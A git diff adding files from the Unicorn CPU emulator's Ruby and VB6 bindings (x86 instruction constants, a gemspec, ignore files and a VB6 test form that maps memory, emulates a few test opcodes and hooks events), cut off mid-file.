UC_X86_INS_VINSERTF64X4 = 904 + UC_X86_INS_VINSERTI128 = 905 + UC_X86_INS_VINSERTI32X4 = 906 + UC_X86_INS_VINSERTI32X8 = 907 + UC_X86_INS_VINSERTI64X2 = 908 + UC_X86_INS_VINSERTI64X4 = 909 + UC_X86_INS_VINSERTPS = 910 + UC_X86_INS_VLDDQU = 911 + UC_X86_INS_VLDMXCSR = 912 + UC_X86_INS_VMASKMOVDQU = 913 + UC_X86_INS_VMASKMOVPD = 914 + UC_X86_INS_VMASKMOVPS = 915 + UC_X86_INS_VMAXPD = 916 + UC_X86_INS_VMAXPS = 917 + UC_X86_INS_VMAXSD = 918 + UC_X86_INS_VMAXSS = 919 + UC_X86_INS_VMCALL = 920 + UC_X86_INS_VMCLEAR = 921 + UC_X86_INS_VMFUNC = 922 + UC_X86_INS_VMINPD = 923 + UC_X86_INS_VMINPS = 924 + UC_X86_INS_VMINSD = 925 + UC_X86_INS_VMINSS = 926 + UC_X86_INS_VMLAUNCH = 927 + UC_X86_INS_VMLOAD = 928 + UC_X86_INS_VMMCALL = 929 + UC_X86_INS_VMOVQ = 930 + UC_X86_INS_VMOVDDUP = 931 + UC_X86_INS_VMOVD = 932 + UC_X86_INS_VMOVDQA32 = 933 + UC_X86_INS_VMOVDQA64 = 934 + UC_X86_INS_VMOVDQA = 935 + UC_X86_INS_VMOVDQU16 = 936 + UC_X86_INS_VMOVDQU32 = 937 + UC_X86_INS_VMOVDQU64 = 938 + UC_X86_INS_VMOVDQU8 = 939 + UC_X86_INS_VMOVDQU = 940 + UC_X86_INS_VMOVHLPS = 941 + UC_X86_INS_VMOVHPD = 942 + UC_X86_INS_VMOVHPS = 943 + UC_X86_INS_VMOVLHPS = 944 + UC_X86_INS_VMOVLPD = 945 + UC_X86_INS_VMOVLPS = 946 + UC_X86_INS_VMOVMSKPD = 947 + UC_X86_INS_VMOVMSKPS = 948 + UC_X86_INS_VMOVNTDQA = 949 + UC_X86_INS_VMOVNTDQ = 950 + UC_X86_INS_VMOVNTPD = 951 + UC_X86_INS_VMOVNTPS = 952 + UC_X86_INS_VMOVSD = 953 + UC_X86_INS_VMOVSHDUP = 954 + UC_X86_INS_VMOVSLDUP = 955 + UC_X86_INS_VMOVSS = 956 + UC_X86_INS_VMOVUPD = 957 + UC_X86_INS_VMOVUPS = 958 + UC_X86_INS_VMPSADBW = 959 + UC_X86_INS_VMPTRLD = 960 + UC_X86_INS_VMPTRST = 961 + UC_X86_INS_VMREAD = 962 + UC_X86_INS_VMRESUME = 963 + UC_X86_INS_VMRUN = 964 + UC_X86_INS_VMSAVE = 965 + UC_X86_INS_VMULPD = 966 + UC_X86_INS_VMULPS = 967 + UC_X86_INS_VMULSD = 968 + UC_X86_INS_VMULSS = 969 + UC_X86_INS_VMWRITE = 970 + UC_X86_INS_VMXOFF = 971 + UC_X86_INS_VMXON = 972 + UC_X86_INS_VPABSB = 973 + UC_X86_INS_VPABSD = 974 + UC_X86_INS_VPABSQ = 975 + UC_X86_INS_VPABSW = 976 + UC_X86_INS_VPACKSSDW = 977 + UC_X86_INS_VPACKSSWB = 978 + UC_X86_INS_VPACKUSDW = 979 + UC_X86_INS_VPACKUSWB = 980 + UC_X86_INS_VPADDB = 981 + UC_X86_INS_VPADDD = 982 + UC_X86_INS_VPADDQ = 983 + UC_X86_INS_VPADDSB = 984 + UC_X86_INS_VPADDSW = 985 + UC_X86_INS_VPADDUSB = 986 + UC_X86_INS_VPADDUSW = 987 + UC_X86_INS_VPADDW = 988 + UC_X86_INS_VPALIGNR = 989 + UC_X86_INS_VPANDD = 990 + UC_X86_INS_VPANDND = 991 + UC_X86_INS_VPANDNQ = 992 + UC_X86_INS_VPANDN = 993 + UC_X86_INS_VPANDQ = 994 + UC_X86_INS_VPAND = 995 + UC_X86_INS_VPAVGB = 996 + UC_X86_INS_VPAVGW = 997 + UC_X86_INS_VPBLENDD = 998 + UC_X86_INS_VPBLENDMB = 999 + UC_X86_INS_VPBLENDMD = 1000 + UC_X86_INS_VPBLENDMQ = 1001 + UC_X86_INS_VPBLENDMW = 1002 + UC_X86_INS_VPBLENDVB = 1003 + UC_X86_INS_VPBLENDW = 1004 + UC_X86_INS_VPBROADCASTB = 1005 + UC_X86_INS_VPBROADCASTD = 1006 + UC_X86_INS_VPBROADCASTMB2Q = 1007 + UC_X86_INS_VPBROADCASTMW2D = 1008 + UC_X86_INS_VPBROADCASTQ = 1009 + UC_X86_INS_VPBROADCASTW = 1010 + UC_X86_INS_VPCLMULQDQ = 1011 + UC_X86_INS_VPCMOV = 1012 + UC_X86_INS_VPCMPB = 1013 + UC_X86_INS_VPCMPD = 1014 + UC_X86_INS_VPCMPEQB = 1015 + UC_X86_INS_VPCMPEQD = 1016 + UC_X86_INS_VPCMPEQQ = 1017 + UC_X86_INS_VPCMPEQW = 1018 + UC_X86_INS_VPCMPESTRI = 1019 + UC_X86_INS_VPCMPESTRM = 1020 + UC_X86_INS_VPCMPGTB = 1021 + UC_X86_INS_VPCMPGTD = 1022 + UC_X86_INS_VPCMPGTQ = 1023 + UC_X86_INS_VPCMPGTW = 1024 + UC_X86_INS_VPCMPISTRI = 1025 + UC_X86_INS_VPCMPISTRM = 1026 + UC_X86_INS_VPCMPQ = 1027 + UC_X86_INS_VPCMPUB = 1028 + UC_X86_INS_VPCMPUD = 1029 + UC_X86_INS_VPCMPUQ = 1030 + UC_X86_INS_VPCMPUW = 1031 + UC_X86_INS_VPCMPW = 1032 + UC_X86_INS_VPCOMB = 1033 + UC_X86_INS_VPCOMD = 1034 + UC_X86_INS_VPCOMPRESSD = 1035 + UC_X86_INS_VPCOMPRESSQ = 1036 + UC_X86_INS_VPCOMQ = 1037 + UC_X86_INS_VPCOMUB = 1038 + UC_X86_INS_VPCOMUD = 1039 + UC_X86_INS_VPCOMUQ = 1040 + UC_X86_INS_VPCOMUW = 1041 + UC_X86_INS_VPCOMW = 1042 + UC_X86_INS_VPCONFLICTD = 1043 + UC_X86_INS_VPCONFLICTQ = 1044 + UC_X86_INS_VPERM2F128 = 1045 + UC_X86_INS_VPERM2I128 = 1046 + UC_X86_INS_VPERMD = 1047 + UC_X86_INS_VPERMI2D = 1048 + UC_X86_INS_VPERMI2PD = 1049 + UC_X86_INS_VPERMI2PS = 1050 + UC_X86_INS_VPERMI2Q = 1051 + UC_X86_INS_VPERMIL2PD = 1052 + UC_X86_INS_VPERMIL2PS = 1053 + UC_X86_INS_VPERMILPD = 1054 + UC_X86_INS_VPERMILPS = 1055 + UC_X86_INS_VPERMPD = 1056 + UC_X86_INS_VPERMPS = 1057 + UC_X86_INS_VPERMQ = 1058 + UC_X86_INS_VPERMT2D = 1059 + UC_X86_INS_VPERMT2PD = 1060 + UC_X86_INS_VPERMT2PS = 1061 + UC_X86_INS_VPERMT2Q = 1062 + UC_X86_INS_VPEXPANDD = 1063 + UC_X86_INS_VPEXPANDQ = 1064 + UC_X86_INS_VPEXTRB = 1065 + UC_X86_INS_VPEXTRD = 1066 + UC_X86_INS_VPEXTRQ = 1067 + UC_X86_INS_VPEXTRW = 1068 + UC_X86_INS_VPGATHERDD = 1069 + UC_X86_INS_VPGATHERDQ = 1070 + UC_X86_INS_VPGATHERQD = 1071 + UC_X86_INS_VPGATHERQQ = 1072 + UC_X86_INS_VPHADDBD = 1073 + UC_X86_INS_VPHADDBQ = 1074 + UC_X86_INS_VPHADDBW = 1075 + UC_X86_INS_VPHADDDQ = 1076 + UC_X86_INS_VPHADDD = 1077 + UC_X86_INS_VPHADDSW = 1078 + UC_X86_INS_VPHADDUBD = 1079 + UC_X86_INS_VPHADDUBQ = 1080 + UC_X86_INS_VPHADDUBW = 1081 + UC_X86_INS_VPHADDUDQ = 1082 + UC_X86_INS_VPHADDUWD = 1083 + UC_X86_INS_VPHADDUWQ = 1084 + UC_X86_INS_VPHADDWD = 1085 + UC_X86_INS_VPHADDWQ = 1086 + UC_X86_INS_VPHADDW = 1087 + UC_X86_INS_VPHMINPOSUW = 1088 + UC_X86_INS_VPHSUBBW = 1089 + UC_X86_INS_VPHSUBDQ = 1090 + UC_X86_INS_VPHSUBD = 1091 + UC_X86_INS_VPHSUBSW = 1092 + UC_X86_INS_VPHSUBWD = 1093 + UC_X86_INS_VPHSUBW = 1094 + UC_X86_INS_VPINSRB = 1095 + UC_X86_INS_VPINSRD = 1096 + UC_X86_INS_VPINSRQ = 1097 + UC_X86_INS_VPINSRW = 1098 + UC_X86_INS_VPLZCNTD = 1099 + UC_X86_INS_VPLZCNTQ = 1100 + UC_X86_INS_VPMACSDD = 1101 + UC_X86_INS_VPMACSDQH = 1102 + UC_X86_INS_VPMACSDQL = 1103 + UC_X86_INS_VPMACSSDD = 1104 + UC_X86_INS_VPMACSSDQH = 1105 + UC_X86_INS_VPMACSSDQL = 1106 + UC_X86_INS_VPMACSSWD = 1107 + UC_X86_INS_VPMACSSWW = 1108 + UC_X86_INS_VPMACSWD = 1109 + UC_X86_INS_VPMACSWW = 1110 + UC_X86_INS_VPMADCSSWD = 1111 + UC_X86_INS_VPMADCSWD = 1112 + UC_X86_INS_VPMADDUBSW = 1113 + UC_X86_INS_VPMADDWD = 1114 + UC_X86_INS_VPMASKMOVD = 1115 + UC_X86_INS_VPMASKMOVQ = 1116 + UC_X86_INS_VPMAXSB = 1117 + UC_X86_INS_VPMAXSD = 1118 + UC_X86_INS_VPMAXSQ = 1119 + UC_X86_INS_VPMAXSW = 1120 + UC_X86_INS_VPMAXUB = 1121 + UC_X86_INS_VPMAXUD = 1122 + UC_X86_INS_VPMAXUQ = 1123 + UC_X86_INS_VPMAXUW = 1124 + UC_X86_INS_VPMINSB = 1125 + UC_X86_INS_VPMINSD = 1126 + UC_X86_INS_VPMINSQ = 1127 + UC_X86_INS_VPMINSW = 1128 + UC_X86_INS_VPMINUB = 1129 + UC_X86_INS_VPMINUD = 1130 + UC_X86_INS_VPMINUQ = 1131 + UC_X86_INS_VPMINUW = 1132 + UC_X86_INS_VPMOVDB = 1133 + UC_X86_INS_VPMOVDW = 1134 + UC_X86_INS_VPMOVM2B = 1135 + UC_X86_INS_VPMOVM2D = 1136 + UC_X86_INS_VPMOVM2Q = 1137 + UC_X86_INS_VPMOVM2W = 1138 + UC_X86_INS_VPMOVMSKB = 1139 + UC_X86_INS_VPMOVQB = 1140 + UC_X86_INS_VPMOVQD = 1141 + UC_X86_INS_VPMOVQW = 1142 + UC_X86_INS_VPMOVSDB = 1143 + UC_X86_INS_VPMOVSDW = 1144 + UC_X86_INS_VPMOVSQB = 1145 + UC_X86_INS_VPMOVSQD = 1146 + UC_X86_INS_VPMOVSQW = 1147 + UC_X86_INS_VPMOVSXBD = 1148 + UC_X86_INS_VPMOVSXBQ = 1149 + UC_X86_INS_VPMOVSXBW = 1150 + UC_X86_INS_VPMOVSXDQ = 1151 + UC_X86_INS_VPMOVSXWD = 1152 + UC_X86_INS_VPMOVSXWQ = 1153 + UC_X86_INS_VPMOVUSDB = 1154 + UC_X86_INS_VPMOVUSDW = 1155 + UC_X86_INS_VPMOVUSQB = 1156 + UC_X86_INS_VPMOVUSQD = 1157 + UC_X86_INS_VPMOVUSQW = 1158 + UC_X86_INS_VPMOVZXBD = 1159 + UC_X86_INS_VPMOVZXBQ = 1160 + UC_X86_INS_VPMOVZXBW = 1161 + UC_X86_INS_VPMOVZXDQ = 1162 + UC_X86_INS_VPMOVZXWD = 1163 + UC_X86_INS_VPMOVZXWQ = 1164 + UC_X86_INS_VPMULDQ = 1165 + UC_X86_INS_VPMULHRSW = 1166 + UC_X86_INS_VPMULHUW = 1167 + UC_X86_INS_VPMULHW = 1168 + UC_X86_INS_VPMULLD = 1169 + UC_X86_INS_VPMULLQ = 1170 + UC_X86_INS_VPMULLW = 1171 + UC_X86_INS_VPMULUDQ = 1172 + UC_X86_INS_VPORD = 1173 + UC_X86_INS_VPORQ = 1174 + UC_X86_INS_VPOR = 1175 + UC_X86_INS_VPPERM = 1176 + UC_X86_INS_VPROTB = 1177 + UC_X86_INS_VPROTD = 1178 + UC_X86_INS_VPROTQ = 1179 + UC_X86_INS_VPROTW = 1180 + UC_X86_INS_VPSADBW = 1181 + UC_X86_INS_VPSCATTERDD = 1182 + UC_X86_INS_VPSCATTERDQ = 1183 + UC_X86_INS_VPSCATTERQD = 1184 + UC_X86_INS_VPSCATTERQQ = 1185 + UC_X86_INS_VPSHAB = 1186 + UC_X86_INS_VPSHAD = 1187 + UC_X86_INS_VPSHAQ = 1188 + UC_X86_INS_VPSHAW = 1189 + UC_X86_INS_VPSHLB = 1190 + UC_X86_INS_VPSHLD = 1191 + UC_X86_INS_VPSHLQ = 1192 + UC_X86_INS_VPSHLW = 1193 + UC_X86_INS_VPSHUFB = 1194 + UC_X86_INS_VPSHUFD = 1195 + UC_X86_INS_VPSHUFHW = 1196 + UC_X86_INS_VPSHUFLW = 1197 + UC_X86_INS_VPSIGNB = 1198 + UC_X86_INS_VPSIGND = 1199 + UC_X86_INS_VPSIGNW = 1200 + UC_X86_INS_VPSLLDQ = 1201 + UC_X86_INS_VPSLLD = 1202 + UC_X86_INS_VPSLLQ = 1203 + UC_X86_INS_VPSLLVD = 1204 + UC_X86_INS_VPSLLVQ = 1205 + UC_X86_INS_VPSLLW = 1206 + UC_X86_INS_VPSRAD = 1207 + UC_X86_INS_VPSRAQ = 1208 + UC_X86_INS_VPSRAVD = 1209 + UC_X86_INS_VPSRAVQ = 1210 + UC_X86_INS_VPSRAW = 1211 + UC_X86_INS_VPSRLDQ = 1212 + UC_X86_INS_VPSRLD = 1213 + UC_X86_INS_VPSRLQ = 1214 + UC_X86_INS_VPSRLVD = 1215 + UC_X86_INS_VPSRLVQ = 1216 + UC_X86_INS_VPSRLW = 1217 + UC_X86_INS_VPSUBB = 1218 + UC_X86_INS_VPSUBD = 1219 + UC_X86_INS_VPSUBQ = 1220 + UC_X86_INS_VPSUBSB = 1221 + UC_X86_INS_VPSUBSW = 1222 + UC_X86_INS_VPSUBUSB = 1223 + UC_X86_INS_VPSUBUSW = 1224 + UC_X86_INS_VPSUBW = 1225 + UC_X86_INS_VPTESTMD = 1226 + UC_X86_INS_VPTESTMQ = 1227 + UC_X86_INS_VPTESTNMD = 1228 + UC_X86_INS_VPTESTNMQ = 1229 + UC_X86_INS_VPTEST = 1230 + UC_X86_INS_VPUNPCKHBW = 1231 + UC_X86_INS_VPUNPCKHDQ = 1232 + UC_X86_INS_VPUNPCKHQDQ = 1233 + UC_X86_INS_VPUNPCKHWD = 1234 + UC_X86_INS_VPUNPCKLBW = 1235 + UC_X86_INS_VPUNPCKLDQ = 1236 + UC_X86_INS_VPUNPCKLQDQ = 1237 + UC_X86_INS_VPUNPCKLWD = 1238 + UC_X86_INS_VPXORD = 1239 + UC_X86_INS_VPXORQ = 1240 + UC_X86_INS_VPXOR = 1241 + UC_X86_INS_VRCP14PD = 1242 + UC_X86_INS_VRCP14PS = 1243 + UC_X86_INS_VRCP14SD = 1244 + UC_X86_INS_VRCP14SS = 1245 + UC_X86_INS_VRCP28PD = 1246 + UC_X86_INS_VRCP28PS = 1247 + UC_X86_INS_VRCP28SD = 1248 + UC_X86_INS_VRCP28SS = 1249 + UC_X86_INS_VRCPPS = 1250 + UC_X86_INS_VRCPSS = 1251 + UC_X86_INS_VRNDSCALEPD = 1252 + UC_X86_INS_VRNDSCALEPS = 1253 + UC_X86_INS_VRNDSCALESD = 1254 + UC_X86_INS_VRNDSCALESS = 1255 + UC_X86_INS_VROUNDPD = 1256 + UC_X86_INS_VROUNDPS = 1257 + UC_X86_INS_VROUNDSD = 1258 + UC_X86_INS_VROUNDSS = 1259 + UC_X86_INS_VRSQRT14PD = 1260 + UC_X86_INS_VRSQRT14PS = 1261 + UC_X86_INS_VRSQRT14SD = 1262 + UC_X86_INS_VRSQRT14SS = 1263 + UC_X86_INS_VRSQRT28PD = 1264 + UC_X86_INS_VRSQRT28PS = 1265 + UC_X86_INS_VRSQRT28SD = 1266 + UC_X86_INS_VRSQRT28SS = 1267 + UC_X86_INS_VRSQRTPS = 1268 + UC_X86_INS_VRSQRTSS = 1269 + UC_X86_INS_VSCATTERDPD = 1270 + UC_X86_INS_VSCATTERDPS = 1271 + UC_X86_INS_VSCATTERPF0DPD = 1272 + UC_X86_INS_VSCATTERPF0DPS = 1273 + UC_X86_INS_VSCATTERPF0QPD = 1274 + UC_X86_INS_VSCATTERPF0QPS = 1275 + UC_X86_INS_VSCATTERPF1DPD = 1276 + UC_X86_INS_VSCATTERPF1DPS = 1277 + UC_X86_INS_VSCATTERPF1QPD = 1278 + UC_X86_INS_VSCATTERPF1QPS = 1279 + UC_X86_INS_VSCATTERQPD = 1280 + UC_X86_INS_VSCATTERQPS = 1281 + UC_X86_INS_VSHUFPD = 1282 + UC_X86_INS_VSHUFPS = 1283 + UC_X86_INS_VSQRTPD = 1284 + UC_X86_INS_VSQRTPS = 1285 + UC_X86_INS_VSQRTSD = 1286 + UC_X86_INS_VSQRTSS = 1287 + UC_X86_INS_VSTMXCSR = 1288 + UC_X86_INS_VSUBPD = 1289 + UC_X86_INS_VSUBPS = 1290 + UC_X86_INS_VSUBSD = 1291 + UC_X86_INS_VSUBSS = 1292 + UC_X86_INS_VTESTPD = 1293 + UC_X86_INS_VTESTPS = 1294 + UC_X86_INS_VUNPCKHPD = 1295 + UC_X86_INS_VUNPCKHPS = 1296 + UC_X86_INS_VUNPCKLPD = 1297 + UC_X86_INS_VUNPCKLPS = 1298 + UC_X86_INS_VZEROALL = 1299 + UC_X86_INS_VZEROUPPER = 1300 + UC_X86_INS_WAIT = 1301 + UC_X86_INS_WBINVD = 1302 + UC_X86_INS_WRFSBASE = 1303 + UC_X86_INS_WRGSBASE = 1304 + UC_X86_INS_WRMSR = 1305 + UC_X86_INS_XABORT = 1306 + UC_X86_INS_XACQUIRE = 1307 + UC_X86_INS_XBEGIN = 1308 + UC_X86_INS_XCHG = 1309 + UC_X86_INS_XCRYPTCBC = 1310 + UC_X86_INS_XCRYPTCFB = 1311 + UC_X86_INS_XCRYPTCTR = 1312 + UC_X86_INS_XCRYPTECB = 1313 + UC_X86_INS_XCRYPTOFB = 1314 + UC_X86_INS_XEND = 1315 + UC_X86_INS_XGETBV = 1316 + UC_X86_INS_XLATB = 1317 + UC_X86_INS_XRELEASE = 1318 + UC_X86_INS_XRSTOR = 1319 + UC_X86_INS_XRSTOR64 = 1320 + UC_X86_INS_XRSTORS = 1321 + UC_X86_INS_XRSTORS64 = 1322 + UC_X86_INS_XSAVE = 1323 + UC_X86_INS_XSAVE64 = 1324 + UC_X86_INS_XSAVEC = 1325 + UC_X86_INS_XSAVEC64 = 1326 + UC_X86_INS_XSAVEOPT = 1327 + UC_X86_INS_XSAVEOPT64 = 1328 + UC_X86_INS_XSAVES = 1329 + UC_X86_INS_XSAVES64 = 1330 + UC_X86_INS_XSETBV = 1331 + UC_X86_INS_XSHA1 = 1332 + UC_X86_INS_XSHA256 = 1333 + UC_X86_INS_XSTORE = 1334 + UC_X86_INS_XTEST = 1335 + UC_X86_INS_FDISI8087_NOP = 1336 + UC_X86_INS_FENI8087_NOP = 1337 + UC_X86_INS_ENDING = 1338 +end \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/pkg/.gitignore b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/pkg/.gitignore new file mode 100644 index 0000000..b7e7725 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/pkg/.gitignore @@ -0,0 +1,10 @@ +/.bundle/ +/.yardoc +/Gemfile.lock +/_yardoc/ +/coverage/ +/doc/ +/pkg/ +/spec/reports/ +/tmp/ +*.gem diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/unicorn-engine.gemspec b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/unicorn-engine.gemspec new file mode 100644 index 0000000..3c91c48 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/ruby/unicorn_gem/unicorn-engine.gemspec @@ -0,0 +1,21 @@ +# coding: utf-8 +lib = File.expand_path('../lib', __FILE__) +$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib) +require 'unicorn_engine/version' + +Gem::Specification.new do |spec| + spec.name = "unicorn-engine" + spec.version = Unicorn::VERSION + spec.authors = ["Sascha Schirra"] + spec.email = ["sashs@scoding.de"] + spec.license = 'GPL-2.0' + spec.summary = %q{Ruby binding for Unicorn-Engine} + spec.description = %q{Ruby binding for Unicorn-Engine <unicorn-engine.org>} + spec.homepage = "https://unicorn-engine.org" + + spec.files = Dir["lib/unicorn_engine/*.rb"] + Dir["ext/unicorn.c"] + Dir["ext/unicorn.h"] + Dir["ext/types.h"] + Dir["ext/extconf.rb"] + spec.require_paths = ["lib","ext"] + spec.extensions = ["ext/extconf.rb"] + spec.add_development_dependency "bundler", "~> 1.11" + spec.add_development_dependency "rake", "~> 10.0" +end diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/.gitattributes b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/.gitattributes new file mode 100644 index 0000000..6101291 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/.gitattributes @@ -0,0 +1,11 @@ +*.frm eol=crlf +*.bas eol=crlf +*.cls eol=crlf +*.ctl eol=crlf +*.vbp eol=crlf +*.txt eol=crlf +*.cpp eol=crlf +*.tli eol=crlf +*.tlh eol=crlf +*.vcproj eol=crlf +*.sln eol=crlf diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/CMemRegion.cls b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/CMemRegion.cls new file mode 100644 index 0000000..bb2085f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/CMemRegion.cls @@ -0,0 +1,50 @@ +VERSION 1.0 CLASS +BEGIN + MultiUse = -1 'True + Persistable = 0 'NotPersistable + DataBindingBehavior = 0 'vbNone + DataSourceBehavior = 0 'vbNone + MTSTransactionMode = 0 'NotAnMTSObject +END +Attribute VB_Name = "CMemRegion" +Attribute VB_GlobalNameSpace = False +Attribute VB_Creatable = True +Attribute VB_PredeclaredId = False +Attribute VB_Exposed = False +'this is for 32bit address space.. +Public address As Long +Public size As Long +Public endsAt As Long +Public perm As Long + +Function toString() As String + toString = "Addr: " & Hex(address) & " Size: " & Hex(size) & " Perm: " & permToString() & " (" & Hex(perm) & ")" +End Function + +'Public Enum uc_prot +' UC_PROT_NONE = 0 +' UC_PROT_READ = 1 +' UC_PROT_WRITE = 2 +' UC_PROT_EXEC = 4 +' UC_PROT_ALL = 7 +'End Enum + +Function permToString() As String + + If perm = 7 Then + permToString = "All" + Exit Function + End If + + If perm = 0 Then + permToString = "None" + Exit Function + End If + + If (perm And 1) = 1 Then permToString = "Read " + If (perm And 2) = 2 Then permToString = permToString & "Write " + If (perm And 4) = 4 Then permToString = permToString & "Exec" + + permToString = Trim(permToString) + +End Function diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Form1.frm b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Form1.frm new file mode 100644 index 0000000..d3fa033 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/vb6/Form1.frm @@ -0,0 +1,256 @@ +VERSION 5.00 +Begin VB.Form Form1 + Caption = "Form1" + ClientHeight = 6720 + ClientLeft = 60 + ClientTop = 345 + ClientWidth = 14220 + LinkTopic = "Form1" + ScaleHeight = 6720 + ScaleWidth = 14220 + StartUpPosition = 2 'CenterScreen + Begin VB.CommandButton Command1 + Caption = "Copy" + Height = 465 + Left = 6180 + TabIndex = 1 + Top = 6150 + Width = 1995 + End + Begin VB.ListBox List1 + BeginProperty Font + Name = "Courier New" + Size = 11.25 + Charset = 0 + Weight = 400 + Underline = 0 'False + Italic = 0 'False + Strikethrough = 0 'False + EndProperty + Height = 5925 + Left = 150 + TabIndex = 0 + Top = 120 + Width = 13965 + End +End +Attribute VB_Name = "Form1" +Attribute VB_GlobalNameSpace = False +Attribute VB_Creatable = False +Attribute VB_PredeclaredId = True +Attribute VB_Exposed = False +Option Explicit + +'Contributed by: FireEye FLARE team +'Author: David Zimmer <david.zimmer@fireeye.com>, <dzzie@yahoo.com> +'License: Apache + +Public WithEvents uc As ucIntel32 +Attribute uc.VB_VarHelpID = -1 +Dim hContext As Long + + +'test sample ported from: (requires unicorn 1.0 for success) +' https://github.com/unicorn-engine/unicorn/blob/master/tests/unit/test_pc_change.c +' https://github.com/unicorn-engine/unicorn/issues/210 + +Private Sub Form_Load() + + Dim ecx As Long, edx As Long + Dim address As Long, size As Long, endAt As Long + Dim b() As Byte, c As Collection, mem As CMemRegion + + Me.Visible = True + + 'you can set UNICORN_PATH global variable to load a specific dll, do this before initilizing the class + Set uc = New ucIntel32 + + If uc.hadErr Then + List1.AddItem uc.errMsg + Exit Sub + End If + + List1.AddItem "ucvbshim.dll loaded @" & Hex(uc.hLib) + List1.AddItem "Unicorn version: " & uc.Version + List1.AddItem "Disassembler available: " & uc.DisasmAvail + If uc.major < 1 Then List1.AddItem "Change Eip in hook test requires >= v1.x for success" + + List1.AddItem "Unicorn x86 32bit engine handle: " & Hex(uc.uc) + +' ReDim b(8) 'for clarity in what we are testing.. +' b(0) = &H41 ' inc ECX @0x1000000 +' b(1) = &H41 ' inc ECX +' b(2) = &H41 ' inc ECX +' b(3) = &H41 ' inc ECX @0x1000003 +' b(4) = &H41 ' inc ECX +' b(5) = &H41 ' inc ECX +' +' b(6) = &H42 ' inc EDX @0x1000006 +' b(7) = &H42 ' inc EDX + +' #define X86_CODE32_MEM_WRITE "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov [0xaaaaaaaa], ecx; INC ecx; DEC edx + + 'we mash up two different test cases, first the change eip in hook test, then an invalid memory access + 'note the format accepted by tobytes() is somewhat forgiving (always use 2char hex vals though) + b() = toBytes("4141414141414242cc\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a") + + ecx = 3 + edx = 15 + address = &H1000000 + size = &H200000 + endAt = address + UBound(b) + 1 + + If Not uc.mapMem(address, size) Then + List1.AddItem "Failed to map in 2mb memory " & uc.errMsg + Exit Sub + End If + + ' write machine code to be emulated to memory + If Not uc.writeMem(address, b()) Then + List1.AddItem "Failed to write code to memory " & uc.errMsg + Exit Sub + End If + + List1.AddItem "starts at: " & uc.disasm(address) + + Dim b2() As Byte + If uc.readMem(address, b2, UBound(b) + 1) Then '+1 because ubound is 0 based.. + List1.AddItem "readMem: " & HexDump(b2, 1) + End If + + uc.reg32(ecx_r) = ecx + uc.reg32(edx_r) = edx + List1.AddItem "start values ECX = " & ecx & " EDX = " & edx + + ' trace all instructions + uc.addHook hc_code, UC_HOOK_CODE + uc.addHook hc_memInvalid, UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED + 'uc.removeHook UC_HOOK_MEM_READ_UNMAPPED Or UC_HOOK_MEM_WRITE_UNMAPPED + uc.addHook hc_int, UC_HOOK_INTR + + List1.AddItem "beginning emulation.." + If Not uc.startEmu(address, endAt) Then List1.AddItem uc.errMsg + + ecx = uc.reg32(ecx_r) + edx = uc.reg8(dl_r) + + List1.AddItem "ECX: 6 =? " & ecx + List1.AddItem "EDX: 17 =? " & edx + List1.AddItem uc.dumpFlags + If ecx <> 6 Then List1.AddItem "failed to change eip in hook!" + + ReDim b(100) 'this will handle mapping and alignment automatically.. + uc.writeBlock &H2001, b(), UC_PROT_READ Or UC_PROT_WRITE + + List1.AddItem "Initilizing sharedMemory with: aabbccddeeff0011223344556677889900" + sharedMemory() = toBytes("aabbccddeeff0011223344556677889900") + ReDim Preserve sharedMemory(&H1000) 'must be 4k bytes aligned... + + If Not uc.mapMemPtr(sharedMemory, &H4000, UBound(sharedMemory)) Then + List1.AddItem "Failed to map in host memory " & uc.errMsg + Else + + Dim bb As Byte, ii As Integer, ll As Long + + If Not uc.writeByte(&H4001, &H41) Then + List1.AddItem "Failed to write byte to shared mem" + Else + List1.AddItem "Wrote 0x41 to sharedMemory + 1" + If uc.readByte(&H4001, bb) Then List1.AddItem "readByte = " & Hex(bb) + End If + + 'uc.writeInt &H4001, &H4142 + 'If uc.readInt(&H4001, ii) Then List1.AddItem Hex(ii) + + 'uc.writeLong &H4001, &H11223344 + 'If uc.readLong(&H4001, ll) Then List1.AddItem Hex(ll) + + Erase b2 + If uc.readMem(&H4000, b2, 20) Then + List1.AddItem "emu read of sharedMemory: " & HexDump(b2, 1) + Else + List1.AddItem "Failed to readMem on sharedMemory " & uc.errMsg + End If + + List1.AddItem "sanity checking host mem: " & HexDump(sharedMemory, 1, , 20) + + End If + + List1.AddItem "Enumerating memory regions..." + + Set c = uc.getMemMap() + + For Each mem In c + List1.AddItem mem.toString() + Next + + If hContext <> 0 Then + List1.AddItem "trying to restore context.." + If Not uc.restoreContext(hContext) Then List1.AddItem uc.errMsg + List1.AddItem uc.regDump() + List1.AddItem "beginning emulation.." + If Not uc.startEmu(uc.eip, endAt) Then List1.AddItem uc.errMsg + List1.AddItem uc.regDump() + List1.AddItem "releasing saved context.." + If Not uc.freeContext(hContext) Then List1.AddItem uc.errMsg + End If + + Set mem = c(2) + If Not uc.changePermissions(mem, UC_PROT_ALL) Then + List1.AddItem "Failed to change permissions on second alloc " & uc.errMsg + Else + List1.AddItem "Changed permissions on second alloc to ALL" + List1.AddItem "redumping memory regions to check..." + Set c = uc.getMemMap() + For Each mem In c + List1.AddItem mem.toString() + Next + End If + + If uc.unMapMem(&H2000) Then + List1.AddItem "Successfully unmapped new alloc" + Else + 